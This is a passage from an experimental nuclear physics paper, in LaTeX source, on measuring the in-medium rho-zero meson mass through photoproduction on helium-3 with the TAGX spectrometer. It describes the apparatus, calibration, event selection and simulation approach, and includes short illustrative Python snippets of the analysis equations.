suppressed, and the breakup-quasifree process becomes dominant. It is
the subthreshold dynamics that motivated the 800$\le$E$_\gamma\le$1120
MeV $\rho^0$ photoproduction experiment.
With the aim of the experiment as stated above, ${^3}He$ becomes an
almost ideal choice of target. The low photon energies
utilized to induce subthreshold photoproduction result in slow
$\rho^0$ mesons with a small Lorentz boost, and therefore a large
probability for decay within the nuclear volume. Thus, in the case of
the exclusive channel, a large nuclear radius is not necessary, and
the larger nuclear density of a heavier target is predicted to have
only a marginally enhanced effect on the $\rho^0$ meson mass
\cite{sai}. Furthermore, if the breakup process is dominated by the
nucleonic field, the size of the target nucleus is
irrelevant. Finally, the ${^3}He$ target is the lightest nucleus where
a nuclear medium effect may be discernible, without the complexity of
overwhelming final state interactions (FSI).
The $\rho^0$ detection is further aided by the inherent selectivity of
the TAGX spectrometer (Section~\ref{sec:spec}) to coplanar
$\pi^+\pi^-$ processes \cite{maru}. This is due to the limited
out-of-plane acceptance of the spectrometer, which preferentially
selects the $\rho^0 \rightarrow \pi^+\pi^-$ channel, at the expense of
two-step processes (e.g. FSI) and uncorrelated $\pi^+\pi^-$ production
at distinct reaction vertices, the latter accounting for the majority
of non-$\rho^0$ background events (Section~\ref{sec:pcs}). This
favorable feature of the spectrometer promotes an otherwise small
component of the total amplitude, namely the subthreshold breakup
channel, to a sizeable experimental signal.
The mass of the $\rho^0$ meson in the nuclear medium was extracted
from the dipion spectra of the 800$\le$E$_\gamma\le$1120 MeV
experiment with the aid of Monte Carlo (MC) simulations
\cite{lolos}. The reported mass shift was far larger than the
predictions of any mean-field driven model pertaining to the exclusive
process for ${^3}He$ \cite{sai}; a calculation based on QHD assuming a
deep scalar potential yielding a $\rho^0$-${^3}He$ bound state, on the
other hand, produced much better agreement~\cite{zisis}. The result of
Ref.~\cite{lolos} led to a reanalysis of the lower-energy measurements
\cite{watts} including the $\rho^0 \rightarrow \pi^+\pi^-$ channel,
and allowing for $\rho^0$ production with a shifted mass. The outcome
of this reanalysis was an even larger shift \cite{hub}, possibly
indicating a mechanism other than those previously considered. A
nucleonic medium effect, as sketched earlier, may be consistent with a
large $\rho^0$-mass reduction, although a theoretical model has yet to
be fully developed \cite{geb4,guic}. Though more work is needed to
firmly establish and better understand these results \cite{sp}, the
${^3}He$($\gamma$,$\pi^+\pi^-$)X experiment for photon energies in the
range 800$\le$E$_\gamma\le$1120 MeV constitutes the first direct
measurement of the $\rho^0$ mass in the nuclear medium. In this
report, a new and more thorough analysis is presented, including the
first direct evidence of the characteristic $J = 1$ signature of the
$\rho^0$ meson decay in the subthreshold region, as well as
refinements in the simulations and fitting procedure, relative to the
analysis of Refs.~\cite{watts,lolos,hub}, leading to higher confidence
in the extraction of the in-medium $\rho^0$ mass.
The paper is organized in six sections. In Section~\ref{sec:tagx},
the experimental set-up and the calibration procedure are reviewed. In
Section~\ref{sec:anal} the data-analysis algorithm is outlined in
conjunction with the experimental aspects of
Section~\ref{sec:tagx}. Section~\ref{sec:mc} focuses on the MC
techniques and the fitting of the data, leading to the extraction of
the mass shift. In Section~\ref{sec:data} the data are compared
with the MC calculations, and the $\rho^0$ mass shifts are discussed.
Finally, the conclusions are presented in Section~\ref{sec:concl}.
\section{APPARATUS}
\label{sec:tagx}
The INS tagged photon beam and the TAGX spectrometer (Fig.~\ref{figtgx})
\cite{maru}, the new straw drift chamber \cite{gar}, and different
aspects of the data-analysis procedure \cite{maru,watts} have all been
described in detail elsewhere, where the reader is referred for a more
extensive discussion. In this section, a brief overview of the
experimental apparatus is provided, as it applies for the
${^3}He$($\gamma$,$\pi^+\pi^-$)X measurements, stressing the elements
that were either introduced for the first time in this experiment, or
that are important for the data analysis.
\subsection{Photon beam and ${^3}He$ target}
\label{sec:pb}
The photon beam is produced utilizing the 1.3 GeV Tokyo Electron
Synchrotron. A series of innovative technical improvements led in 1987
to the upgrading of the photon beam to one of medium duty cycle. In
the present experiment, the endpoint electron energy E$_s$ is 1.22 GeV
at an average 10\% duty factor, corresponding to a 5 ms extraction
time. The instantaneous energy of the extracted electrons has a
sinusoidal dependence, and it is known by measuring the extraction
time. The extracted electrons are directed via a beamline onto a thin
platinum radiator where bremsstrahlung photons are produced, while the
scattered electrons are bent away from the beam by a rectangular
analyzer magnet of 1.17 T. The magnet settings of the extraction
beamline vary sinusoidally in time, in phase with the E$_s$ energy.
An array of 32 scintillator electron-tagging counters, each with a 10
MeV/c momentum acceptance, detect the scattered electrons. The
position of the tagger registering the scattered electron determines
its energy, and consequently that of the bremsstrahlung photon as
E$_\gamma$ = E$_e$ - E$_{e'}$ with $\Delta$E$_\gamma\sim \pm$5~MeV
accuracy. A second set of 8 backing taggers participates in the
coincidence triggering signal, along with the 32 frontal ones, and
is discussed in the following section. The tagged photon intensity was
maintained at an average of $\sim$3.5 $\times$ 10$^5$ $\gamma$/s, well
within the tolerance of the data acquisition system for accidental
triggers. The photons, distributed over a beam spot of $\sim$2~cm in
diameter, are subsequently incident on a liquid ${^3}He$ target. The
target is at a temperature of 1.986$\pm$0.001 K, corresponding to a
0.0786 g/cm$^3$ density, and is contained in a cylindrical vessel 90
mm in height and 50 mm in diameter at the center of the TAGX
spectrometer \cite{target}.
The tagger hits are related to the photon flux incident upon the
target after efficiency corrections. In particular, due to the
collimation of the photon beam downstream from the taggers, some of
the tagged photons do not reach the target. To determine the tagging
efficiency, and consequently the photon flux, a lead-glass
$\breve{C}$erenkov counter is placed in the photon beam, with reduced
flux, downstream from the target, and the tagger scalers are
periodically recorded both with and without the platinum radiator in
place. The efficiency per tagger counter is determined by the
relation
\begin{equation}
\eta_{\imath\in[1,32]}={ {\left[\breve{C}\cdot T_\imath\right]_{in}
- \left[\breve{C}\cdot T_\imath\right]_{out}
- \left[\breve{C}_{acc}\cdot T_\imath\right]_{in}
}\over{T_{\imath_{in}}
- T_{\imath_{out}}} }
\label{eta}\end{equation}
where $T_\imath$ is the scaler count for each of the frontal taggers.
The term $\left[\breve{C}\cdot T_\imath\right]_{out}$ corresponds to
the coincidences between a tagger-counter and a lead-glass
$\breve{C}$erenkov hit from a spurious photon not originating from the
platinum radiator, and $\left[\breve{C}_{acc}\cdot
T_\imath\right]_{in}$ is the number of accidental coincidences with
the radiator in place, but with the $\breve{C}$erenkov hit registering
with a delay of the order of 100~ns with respect to the tagger counter
signal. These two terms turn out to be negligible relative to the term
$\left[\breve{C}\cdot T_\imath\right]_{in}$ in Eq.~(\ref{eta}), which
gives the efficiency-corrected number of tagged photons per tagger
reaching the target as
\begin{equation}
N_{\imath\in[1,32]} = \eta_\imath T_{\imath_{in}} \left(1-{
{T_{\imath_{out}}\over{T_{\imath_{in}}}}}\right) \ .
\label{norm}\end{equation}
The efficiencies $\eta_\imath$ and radiator out/in ratios ${\cal
R_\imath}$ = $T_{\imath_{out}}/T_{\imath_{in}}$ for the 32 frontal
taggers are recorded in a number of dedicated runs, in regular
intervals throughout the experiment, and they are used, along with
Eq.~(\ref{norm}), in the empty-target background subtraction procedure
applied to the measured spectra (see Section~III).
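A minimal numerical sketch of Eqs.~(\ref{eta}) and (\ref{norm})
follows; the scaler and coincidence counts below are invented for
illustration, not measured values from this experiment.

```python
def tagger_efficiency(coinc_in, coinc_out, coinc_acc, t_in, t_out):
    # Eq. (eta): true Cherenkov-tagger coincidences (radiator in, minus
    # the radiator-out and accidental terms) divided by the
    # background-subtracted tagger scaler counts.
    return (coinc_in - coinc_out - coinc_acc) / (t_in - t_out)

def tagged_photons(eta, t_in, t_out):
    # Eq. (norm): efficiency-corrected photons on target per tagger,
    # N_i = eta_i * T_in * (1 - T_out / T_in).
    return eta * t_in * (1.0 - t_out / t_in)

# Invented scaler counts for one tagger channel (illustration only):
eta = tagger_efficiency(coinc_in=9000, coinc_out=50, coinc_acc=20,
                        t_in=12000, t_out=500)
n_gamma = tagged_photons(eta, t_in=12000, t_out=500)
```

Note that Eq.~(\ref{norm}) reduces to $\eta_\imath\,(T_{\imath_{in}} -
T_{\imath_{out}})$, i.e.\ the efficiency applied to the
background-subtracted scaler count.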
\subsection{Spectrometer}
\label{sec:spec}
The TAGX spectrometer has an acceptance of $\pi$ sr for charged
particles (neutral-particle detection was not utilized in the present
experiment), and has been in use at INS since 1987. It consists of
several layers of detector elements (Fig.~\ref{figtgx}) positioned
radially outwards from the target vessel, which is located at the
center of the 0.5~T field of a dipole analyzer magnet.
Directly surrounding the target container is the inner hodoscope (IH),
made up of two sets of six scintillator counters, one on each side of
the beam. The IH is used in the trigger, as well as in measuring the
time of flight (TOF) of the outgoing particles \cite{maru,gar}. As it
is placed inside a strong magnetic field, the light signal is carried
by optical fibers to the photomultiplier tubes, which are located at
the fringes of the magnetic field two meters away.
Next is the straw drift chamber (SDC), operating since 1994 and
installed expressly for the measurement of the $\rho^0$ mass in
${^3}He$, with the objective of improving the momentum resolution for
the detection of the $\rho^0 \rightarrow \pi^+\pi^-$ decay channel
\cite{gar}. The SDC consists of two semi-circular cylindrical
sections, each containing four layers of vertical cells. The ``straw''
cells have tube-shaped cathodes which induce a radial electric field,
and consequently have a regular field definition and high position
resolution ($\sim$150~$\mu$m). The SDC was designed to preserve the
$\pi$-sr large acceptance prior to its installation, to not impose
extensive modifications of the spectrometer, and to not induce
significant energy losses to traversing particles by keeping its
thickness to a minimum. The installation of the SDC required,
nonetheless, the replacement of the IH from an earlier set of
scintillators with the one described above.
Surrounding the SDC are two semicircular cylindrical drift chambers
(CDC) subtending angles from 15$^\circ$ to 165$^\circ$ on both sides
of the beamline in the horizontal plane, and $\pm$18.3$^\circ$ in
vertical out-of-plane angles. The CDC is composed of twelve concentric
layers of drift cells, yielding a $\sim$250-300~$\mu$m horizontal and
$1.5$~cm vertical resolution. Together with the SDC, they are used to
determine the planar momentum and emission angle of the charged
particles traversing them, and the vertex position of trajectory
crossings.
The outer set of 33 scintillator elements comes next, serving as the
outer hodoscope (OH), with PMT's attached at both ends to help
determine the track angle relative to the median plane. The two sets
of hodoscopes, IH and OH, measure the TOF corresponding to the tracked
trajectories.
Other components of the TAGX spectrometer include 4 sets of
155~mm~$\times$~50~mm~$\times$~5~mm $e^+e^-$ background veto counters
positioned along the OH arms in the median plane. The veto counters
eliminate charged-particle tracks registering within $\Delta z = \pm$
2.5 mm, mostly affecting forward-focused $e^+e^-$ pairs produced
copiously downstream from the target, but having a small effect on
$\pi^+\pi^-$ events.
\subsection{Data acquisition and calibration}
\label{sec:daq}
Since the channel of interest is $\pi^+\pi^-$ production from the
decay of the $\rho^0$ meson, the trigger required a coincidence of two
charged particles on opposite sides of the beam axis. Two levels of
triggering are implemented in order to optimize the data acquisition
electronics. The pretrigger
\begin{equation}
{\cal PT}=IH_L\cdot IH_R \cdot \sum_{\imath=1}^8 TAG_{\imath_{back}} \cdot
{\overline {EM}}_{front}
\label{ptrig}
\end{equation}
is generated within 100~ns from the occurrence of an event. A
coincidence of a left and right IH hit with a backing tagger hit is
required, and not rejected by the forward $e^+e^-$ veto counters. The
main trigger
\begin{equation}
{\cal MT}={\cal PT} \cdot OH_L\cdot OH_R \cdot \sum_{\imath=1}^{32}
TAG_{\imath_{front}} \cdot
{\overline{Inhibit}}
\label{mtrig}
\end{equation}
requires the coincidence of the pretrigger with a left and right OH
hit and a forward tagger hit, not rejected by the computer inhibit
signal. A window of 400~ns is available between the ${\cal PT}$ and
the ${\cal MT}$, after which the CAMAC is cleared for the next ${\cal
PT}$. Typical counting rates are 2~kHz and 30~Hz for the ${\cal PT}$
and ${\cal MT}$, respectively.
The calibration of the scintillation counters and the CDC and SDC has
been the subject of extensive effort \cite{maru,gar,iur}. More
recently, a series of modifications implemented in the track fitting
algorithms has resulted in significant improvements, mainly in the
planar-momentum resolution \cite{aki}. It is the tracking that is
discussed next.
The CDC consists of four groups of three-wire layers
(Fig.~\ref{figtgx}). The last layer of wires for each group was
intended for charge division readout and had not been employed in the
past \cite{maru}. Instead, hits from the eight remaining CDC layers
were used for the reconstruction of the planar momentum $p_{xy}$,
emission angle $\theta_{sc}$, and vertex position (see also
Section~\ref{sec:obs}). This earlier eight-layer tracking procedure
did not incorporate the SDC information either, thus resulting
altogether in a less-than-optimal momentum resolution. Since longer
effective lengths of reconstructed tracks result in higher-quality
fits, however, TDCs from the last layer of wires of the fourth group
have been implemented for the first time in the present analysis.
Furthermore, the SDC data have also been used for the first time, a
combination which yields an overall improvement in the planar momentum
resolution estimated to be $\sigma_{p_{xy}}$/p$_{xy}$ = 0.0892p$_{xy}$
+ 0.0057, compared with $\sigma_{p_{xy}}$/p$_{xy}$ = 0.1150p$_{xy}$ +
0.0078 from the 8-layer CDC analysis \cite{aki}. For a particle of
p$_{xy}$=300~MeV/c, this amounts to a 40\% improvement in the planar
momentum resolution. The corresponding improvement in the vertex
position is reflected in Fig.~\ref{figsdc}, and has allowed for more
stringent tests in the selection of two-track events which originate
from the target area. A minor improvement has also been noted in the
emission angle resolution, which stays relatively constant at
$\sigma_\varphi \sim$~0.3$^\circ$ throughout the range of typical
planar momenta 100 MeV/c $\le$ p$_{xy} \le$~500~MeV/c \cite{aki}.
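The two resolution parameterizations can be compared numerically as
below; the unit convention assumed here (p$_{xy}$ in GeV/c) is an
assumption of this sketch, not stated explicitly in the text.

```python
def rel_resolution(p_xy, slope, offset):
    # Relative planar-momentum resolution sigma_p/p = slope * p_xy + offset.
    return slope * p_xy + offset

p_xy = 0.300  # GeV/c (unit convention assumed for illustration)
new = rel_resolution(p_xy, 0.0892, 0.0057)  # SDC + 9-layer CDC tracking
old = rel_resolution(p_xy, 0.1150, 0.0078)  # earlier 8-layer CDC tracking
```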
The steps involved in the tracking of trajectories through the SDC and
CDC may be summarized in the following: The CDC TDCs operate in
``common-stop'' mode, with the start determined from each CDC sense
wire and the stop from the IH \cite{maru}. The CDC drift times are
first corrected by the corresponding TDC timing offsets. The
drift-length to drift-time relation is determined next, per layer of
CDC wires, as a fifth-order polynomial. This is an iterative process,
where an initial set of parameters is used to reconstruct a sample of
well-defined high-momentum tracks. The reconstructed trajectories
yield a new set of parameters, and the procedure is repeated until the
convergence condition is reached, namely that the residual root mean
square (RRMS) improvement over the final two cycles is no better than
0.5\%.
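The convergence logic of this iterative recalibration can be sketched
as follows; the actual fifth-order polynomial refit is replaced here
by a toy stand-in update function, so only the stopping criterion is
illustrated.

```python
def iterate_calibration(update, rrms_of, params, tol=0.005, max_cycles=50):
    # Repeat: refit the drift-length-to-drift-time parameters from the
    # reconstructed track sample, and stop once the residual-RMS (RRMS)
    # improvement over a cycle falls below tol (0.5% in the text).
    rrms = rrms_of(params)
    for _ in range(max_cycles):
        params = update(params)
        new_rrms = rrms_of(params)
        if (rrms - new_rrms) / rrms < tol:
            return params, new_rrms
        rrms = new_rrms
    return params, rrms

# Toy stand-ins: each cycle halves the distance to the "true" calibration,
# and the RRMS has an irreducible floor of 0.1.
target = 1.0
result, final_rrms = iterate_calibration(
    update=lambda p: p + 0.5 * (target - p),
    rrms_of=lambda p: abs(p - target) + 0.1,
    params=0.0,
)
```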
Once a CDC track has been reconstructed, a similar procedure is
followed for the SDC, where first the TDC timing offset is determined,
and subsequently a SDC length-to-time relationship is extracted. This
accomplished, ``best'' SDC tracks are identified, which qualify as
candidate extensions of a selected CDC track. Typically, 2-4 SDC
tracks are selected as possible extensions of a reconstructed CDC
track when all four SDC layers have registered a hit, to a maximum of
8 candidate tracks if one SDC layer is missed. The SDC tracks are
approximated by straight-line segments, since the error in the
position of even the slowest particles which may be expected to result
in valid two-track events is within the 150~$\mu$m tolerance of the
SDC. Finally, the SDC candidates are matched with the CDC
reconstructed track, by requiring the minimal CDC + SDC RRMS of the
combined track.
The obtained TOF resolution $\sigma_t$ is better than 380~ps
\cite{maru}. The TOF is used for particle identification, as well as
for the determination of the particles' OH position (along the ${\hat
z}$-axis in the TAGX frame as shown in Fig.~\ref{figtgx}).
\section{DATA ANALYSIS}
\label{sec:anal}
The data presented in this report were collected in two periods, with
${^3}He$ and empty-target measurements in each. The superior quality
of the photon beam, and a longer running period, resulted in better
statistics and a higher ratio of $\pi^+\pi^-$ to accidental triggers
for the second phase. This is reflected in the tagger efficiencies and
radiator out/in ratios, defined in Eq.~(\ref{norm}), which during the
later part of the experiment were generally improved. A total of
16,366 $\pi^+\pi^-$ events have been identified from the analysis of
two-track events, comprising 73\% of the total number of reconstructed
events, the remaining being of three (23\%) or more tracks
($<$4\%). With the extraction of the $\pi^+\pi^-$ yield Y, the total
cross section $\sigma_T$ is determined from the relation
\begin{equation}
\sigma_T = {Y\over{N_TN_\gamma\eta_{\pi^+\pi^-}\eta_{daq}}}
\label{yield}
\end{equation}
where $N_T$ (nuclei/cm$^2$) is the ${^3}He$ target density seen by the
photon beam, and $N_\gamma$ is the incident photon flux. The
efficiencies $\eta_{daq}$ and $\eta_{\pi^+\pi^-}$ account for the
data-acquisition livetime and $\pi^+\pi^-$ detection efficiencies.
The latter, which is in the range of 2.7-6.8\% for the $\rho^0$
channels, is determined by dedicated MC routines and is
reaction-channel specific (see Ref.~\cite{maru}).
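Eq.~(\ref{yield}) in code form; all input values below are
hypothetical placeholders, not the measured yield, flux, or
efficiencies of this experiment.

```python
def total_cross_section(y, n_t, n_gamma, eta_pipi, eta_daq):
    # Eq. (yield): sigma_T = Y / (N_T * N_gamma * eta_pipi * eta_daq);
    # with N_T in nuclei/cm^2 the result is in cm^2.
    return y / (n_t * n_gamma * eta_pipi * eta_daq)

# Hypothetical inputs (illustration only):
sigma_T = total_cross_section(y=1.6e4, n_t=9.4e21, n_gamma=2.0e12,
                              eta_pipi=0.05, eta_daq=0.9)
```

Since the detection efficiency appears in the denominator, a
channel-specific $\eta_{\pi^+\pi^-}$ from the MC directly rescales the
extracted cross section.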
\subsection{Empty target background}
\label{sec:ets}
In Section~\ref{sec:pb}, the extraction of the tagger efficiencies,
and the normalization of the tagger scalers to reflect the number of
photons incident on the target, were discussed. These are utilized in
determining the appropriate factor by which empty-target spectra are
scaled prior to their subtraction from the corresponding
${^3}He$-target spectra, for the removal of target background
counts. The procedure is briefly summarized in the following steps.
At regular intervals throughout each of the ${^3}He$-target and
empty-target running periods, the lead-glass $\breve{C}$erenkov
counter is employed in dedicated reference runs to determine the
quantities $\eta_\imath$ and ${\cal R}_\imath$, as described in
Section~\ref{sec:pb}. The total number of photons incident on the
target per experiment is extracted as the sum of the raw scaler counts
T$_\imath$, recorded for each run, corrected by the efficiency and
out/in ratios for that run, according to Eq.~(\ref{norm}), and
weighted by the normalized energy distribution of the scattered
electrons. In particular, $\eta_\imath$ and ${\cal R}_\imath$ for each
run are calculated from the corresponding quantities of the reference
runs, on the assumption that they vary linearly with the raw scaler
counts accumulated between runs. The ratios of photon fluxes between
each ${^3}He$-target and its corresponding empty-target experiment
yield the scaling factors by which the latter are normalized prior to
subtraction from the former. The x-coordinate spectrum of the
two-pion crossing vertex after background subtraction, indicative of
the accuracy of this procedure, is shown in Fig.~\ref{figtv}.
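The scaling-and-subtraction step can be sketched as follows; the
spectra and photon fluxes are invented for illustration.

```python
def subtract_empty_target(he3_spectrum, empty_spectrum,
                          n_gamma_he3, n_gamma_empty):
    # Scale the empty-target spectrum by the ratio of efficiency-corrected
    # photon fluxes, then subtract it bin by bin from the He-3 spectrum.
    scale = n_gamma_he3 / n_gamma_empty
    return [full - scale * empty
            for full, empty in zip(he3_spectrum, empty_spectrum)]

corrected = subtract_empty_target([120.0, 80.0, 40.0], [10.0, 6.0, 2.0],
                                  n_gamma_he3=4.0e11, n_gamma_empty=2.0e11)
```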
\subsection{Experimental observables}
\label{sec:obs}
The calibration procedure, discussed in Section~\ref{sec:daq}, allows
the extraction of the planar momentum $p_{xy}$, the polar emission
angle in the median plane $\varphi$, the planar trajectory length
$l_{xy}$ from the SDC + CDC particle tracking, and the time of flight
and z-coordinate (OH position) from the IH and OH scintillators:
\begin{eqnarray}
&&t = {1\over 2}\left(t^{up}_{OH}+t^{down}_{OH}\right) - t_{IH}\nonumber \\
&&z = {1\over 2}\left(t^{down}_{OH}-t^{up}_{OH}\right)v_{eff}
\label{ihoh}
\end{eqnarray}
The up-down indices correspond to the timing measurements at the two
ends of the OH, and $v_{eff}$ is the effective light transmission
velocity in the scintillator material. These yield the primary
observables (Figs.~\ref{figtvm},\ref{figkin})
\begin{eqnarray}
&&\theta_{dip} = tan^{-1}\left({z\over l_{xy}} \right)\nonumber \\
&&p = p_{xy}/cos\,\theta_{dip}\nonumber \\
&&l = l_{xy}/cos\,\theta_{dip}\nonumber \\
&&\beta = l/ct\nonumber \\
&&m = p/\beta\gamma c\nonumber \\
&&\theta_{sc} = cos^{-1}\left( cos\varphi\,{p_{xy}\over p} \right)
\label{pkin}
\end{eqnarray}
where $\theta_{dip}$ is the out-of-plane dip angle, $p$ and $l$ the
total momentum amplitude and three-dimensional trajectory length, and
$\theta_{sc}$ the scattering angle with respect to the incident beam
(Fig.~\ref{figkin}). A left-right asymmetry noted in the scattering
angle $\theta_{sc}$ spectrum (Fig.~\ref{figkin}d) has been reproduced
in the MC simulations.
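Equations~(\ref{ihoh}) and (\ref{pkin}) translate directly into code. In the sketch below the timings, the value of $v_{eff}$, and the tracking inputs are invented for illustration and are not TAGX calibration constants.

```python
import math

# Hypothetical inputs (not TAGX calibration values)
t_oh_up, t_oh_down, t_ih = 5.4, 7.4, 2.9   # scintillator timings, ns
v_eff = 16.0          # cm/ns, effective light velocity in the OH
p_xy = 250.0          # MeV/c, planar momentum from SDC + CDC tracking
phi = math.radians(40.0)   # in-plane polar emission angle
l_xy = 90.0           # cm, planar trajectory length
c = 29.9792458        # cm/ns

# Eq. (ihoh): time of flight and z-coordinate from the IH/OH timings
t = 0.5 * (t_oh_up + t_oh_down) - t_ih
z = 0.5 * (t_oh_down - t_oh_up) * v_eff

# Eq. (pkin): derived observables
theta_dip = math.atan2(z, l_xy)            # out-of-plane dip angle
p = p_xy / math.cos(theta_dip)             # total momentum, MeV/c
l = l_xy / math.cos(theta_dip)             # 3D trajectory length, cm
beta = l / (c * t)
gamma = 1.0 / math.sqrt(1.0 - beta**2)
m = p / (beta * gamma)                     # particle mass, MeV/c^2
theta_sc = math.acos(math.cos(phi) * p_xy / p)   # scattering angle
```

With these invented inputs the reconstructed mass comes out near the charged-pion mass, as it would for a genuine $\pi^\pm$ track.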
A coincidence of two charged particles, one on either side of the
photon beam, signifies the occurrence of an event
(Section~\ref{sec:daq}). A series of tests and cuts in the data set
subsequently eliminate all but the $\pi^+\pi^-$ pairs. In particular,
first the time-of-flight versus planar momentum spectra are used for
particle identification (PID, Fig.~\ref{figtvm}). The great majority
of events including a proton or e$^\pm$ are thus discarded. Cuts on
the tagger TDC spectra reject events induced by spurious photons that
are out of time with the beam pulse. Last, pairs with
low-confidence tracks (large RRMS), or whose vertex falls outside the
target area (Fig.~\ref{figsdc}) are eliminated, thus completing a
first-level selection based on directly measured observables.
For the two-track events that have cleared the tests above, and have
been identified as $\pi^+\pi^-$, additional kinematical observables
are calculated. At this stage, the few surviving two-track events
involving a proton or e$^\pm$ that had been previously misidentified
as $\pi^+\pi^-$ by the PID cuts are eliminated as well. The calculated
observables include the dipion invariant mass m$_{\pi^+\pi^-}$, the
laboratory production angle of the dipion system $\Theta_{IM}$, the
missing mass m$_{miss}$ and momentum p$_{miss}$, the $\pi^+$-$\pi^-$
laboratory opening angle $\vartheta_{\pi^+\pi^-}$, and the $\pi^+$
production angle in the dipion center of mass $\theta^*_{\pi^+}$,
employed as variables in the MC fitting procedure
(Section~\ref{sec:mc}).
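The calculated observables follow from four-momentum arithmetic. A minimal sketch, with invented pion momenta, the photon taken along $z$, and the ${^3}He$ target at rest, is:

```python
import math

M_PI = 139.57     # charged-pion mass, MeV/c^2
M_HE3 = 2808.4    # approximate 3He mass, MeV/c^2
E_GAMMA = 840.0   # photon energy, MeV; beam along z

def four_vec(m, px, py, pz):
    """On-shell four-vector [E, px, py, pz] in MeV units (c = 1)."""
    return [math.sqrt(m*m + px*px + py*py + pz*pz), px, py, pz]

# Hypothetical laboratory momenta of the two pions (MeV/c)
pip = four_vec(M_PI, 150.0, 80.0, 20.0)
pim = four_vec(M_PI, -120.0, 95.0, -10.0)

# Dipion invariant mass
dipi = [a + b for a, b in zip(pip, pim)]
m_pipi = math.sqrt(dipi[0]**2 - dipi[1]**2 - dipi[2]**2 - dipi[3]**2)

# Missing four-vector: (photon + target at rest) - dipion
miss = [E_GAMMA + M_HE3 - dipi[0], -dipi[1], -dipi[2], E_GAMMA - dipi[3]]
p_miss = math.sqrt(miss[1]**2 + miss[2]**2 + miss[3]**2)
m_miss = math.sqrt(miss[0]**2 - p_miss**2)

# pi+ - pi- laboratory opening angle (degrees)
dot = sum(a * b for a, b in zip(pip[1:], pim[1:]))
mag = lambda v: math.sqrt(sum(x * x for x in v[1:]))
opening = math.degrees(math.acos(dot / (mag(pip) * mag(pim))))
```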
Among these observables, the production angle of either pion in the
dipion center-of-mass frame, for example $\theta^*_{\pi^+}$, is unique
as a direct experimental observable in that, without the aid of
simulations or assumptions, it points to the presence of the $\rho^0$
production channel well below the nominal threshold energy. This is
discussed next.
\subsection{The $J=1$ signature of the $\rho^0$}
\label{sec:le1}
Among the dominant production channels participating in $\pi^+\pi^-$
photoproduction in the E$_\gamma \sim$ 1 GeV region
(Section~\ref{sec:pcs}), the $\rho^0 \rightarrow \pi^+\pi^-$ channel
alone results in the two pions being produced at a single reaction
vertex with the characteristic $J = 1$ angular correlation from the
decay of the $\rho^0$. In the dipion center-of-mass frame this
translates into a pure cos$^2\theta^*_{\pi^+}$ distribution, where
$\theta^*_{\pi^+}$ is the $\pi^+$ production angle with respect to the
direction of the dipion momentum, as defined in the laboratory
frame. On the assumption of a slowly-varying $\pi^+\pi^-$ background
interfering with the $\rho^0$ amplitude, the angular distributions are
expected to be symmetric around $\theta^*_{\pi^+}$ = 90$^\circ$ for
dipion cm energies near the mass of the $\rho^0$ meson, where the
$\rho^0 \rightarrow \pi^+\pi^-$ amplitude peaks. Away from the
$\rho^0$ mass, the resonant amplitude vanishes, and the background
processes dictate the shape of the spectra \cite{rhob}. Thus, above
and below the $\rho^0$-meson mass, the angular distribution is
expected to regain a quasi-isotropic shape, due either to
uncorrelated pions produced at two or more reaction vertices, as is
the case for the majority of the participating background processes,
or to s-wave correlated pions, possibly produced in the decay of the
$\sigma$ meson (Section~\ref{sec:pcs}).
This technique, of $\rho^{0,\pm}$ identification via the study of the
pion-scattering angle in the dipion cm frame, has been extensively
used in many previous analyses (e.g. Ref.~\cite{rhoa}). The
$\theta^*_{\pi^+}$ distribution spectrum, based on the above, is
expected to be well-described as A + B\,cos$^2\theta^*_{\pi^+}$, in
the vicinity of the dipion invariant mass matching that of the
$\rho^0$ meson, where the $\rho^0 \rightarrow \pi^+\pi^-$ amplitude
peaks.
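The expected form A + B\,cos$^2\theta^*_{\pi^+}$ can be checked with a toy fit. The bin contents and true parameter values below are invented, and a simple linear least squares in the basis $\{1, \cos^2\theta^*\}$ stands in for the actual fitting of the measured distributions.

```python
import numpy as np

rng = np.random.default_rng(7)

# Toy angular distribution: isotropic background A plus a J = 1
# component B cos^2(theta*); the true values are invented.
A_true, B_true = 50.0, 120.0
cost = np.linspace(-0.9, 0.9, 10)                 # bin centres in cos(theta*)
counts = rng.poisson(A_true + B_true * cost**2).astype(float)

# Linear least squares for counts ~ A + B cos^2(theta*)
X = np.column_stack([np.ones_like(cost), cost**2])
(A_fit, B_fit), *_ = np.linalg.lstsq(X, counts, rcond=None)
```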
The $\pi^+\pi^-$ events in the range of 400-800 MeV/c$^2$ in dipion
invariant mass have been divided into four 100 MeV/c$^2$ bins, which is
the finest binning allowed by the data statistics. An additional cut,
determined from the MC simulations of the TAGX $\rho^0$ detection
efficiency and kinematical considerations, eliminates those
$\pi^+\pi^-$ events with too small an opening angle to have been the
outcome of back-to-back production at a single reaction vertex (see
Section~\ref{sec:fp}). The latter cut results in a further 9-10\%
reduction in the total number of $\pi^+\pi^-$ events in the 400-800
MeV/c$^2$ dipion invariant-mass region, affecting only events from
background processes, effectively boosting the $\rho^0 \rightarrow
\pi^+\pi^-$ amplitude relative to the background (Fig.~\ref{figcos}).
The 500-600, and 600-700 MeV/c$^2$ regions (Figs.~\ref{figcos}b,c)
clearly demonstrate the $J=1$ fingerprint of the $\rho^0$ meson
decay. The deviation from cos$^2\theta^*_{\pi^+}$ toward $\pm$1 is
reproduced in MC simulations of the $\rho^0 \rightarrow \pi^+\pi^-$
process, and it is shown to be the effect of the TAGX detection
efficiency, stemming from the two-track detection requirement (see
Section~\ref{sec:fp} and Fig.~\ref{figacc}). The quasi-resonant
$\rho^0 \rightarrow \pi^+\pi^-$ amplitude over the 500-700 MeV/c$^2$
dipion invariant-mass range points to a substantially reduced $\rho^0$
mass {\it beyond} the trivial apparent lowering, which is the artifact
of probing the lower tail of the $\rho^0$ mass distribution with
low-energy photons (Section~\ref{sec:int}).
\section{SIMULATIONS}
\label{sec:mc}
The MC simulations constitute an integral part of the data analysis by
determining the process-dependent detection efficiencies of the
spectrometer, guiding the assignment of the weight to each of the
contributing production mechanisms, and, ultimately, leading to the
extraction of the medium-modified $\rho^0$ mass.
The steps involved in the simulations and fitting algorithm can be
outlined as follows:
\begin{itemize}
\item Eleven individual $\pi^+\pi^-$ production channels are coded
into MC generators (Section~\ref{sec:pcs}). These eleven processes are
considered to account for the full $\pi^+\pi^-$ photoproduction yield
in the $\gamma + {^3}He$ reaction. Twelve distributions of six
kinematical observables, with cuts aiming to separate the bound
${^3}He$ from the dissociated $ppn$ final state, are simulated for
each production channel and each of four $\Delta$E$_\gamma$ energy
bins (Section~\ref{sec:fp}). The analysis of the MC events is
identical to that of the experimental data, and yields the
process-dependent spectrometer acceptance (Section~\ref{sec:fp}).
\item The simulated spectra for nine of the above elementary processes
